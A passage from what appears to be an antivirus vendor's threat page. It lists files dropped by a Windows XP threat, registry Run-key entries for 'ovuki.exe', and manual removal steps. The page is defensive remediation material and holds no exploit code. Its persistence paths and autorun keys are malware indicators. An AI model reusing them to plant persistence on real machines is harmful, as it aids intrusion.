    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (2630 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %WinDir%\SECD0.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1031 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %WinDir%\iis6.log (135629 bytes)
    %WinDir%\comsetup.log (48646 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (245581 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %WinDir%\ntdtcsetup.log (22997 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (70080 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
    %WinDir%\assembly\tmp\SADGJMPS\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\WEHLORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\FY147ADG\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\HZ369CFI\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\CUX036AD\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\J369CFIL\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\CUX0369C\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\7PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\O7BEHKNQ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\2LORUX03\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\I0369CGJ\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\9RUX0369\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\4NQTWZ36\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\GZ258C0P\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\RADGJMPS\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\ZILORUX0\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\2LOSVY14\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\CVY147AD\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\BTWZ258B\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\4NQTW036\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\ZHKNQUX0\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\P8BEHKNR\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\HZ258BEH\System.Management.Automation.dll (81046 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\uk-ua[1].htm (29849 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe (259 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\ovuki\ovuki.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\ovuki\ovuki.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now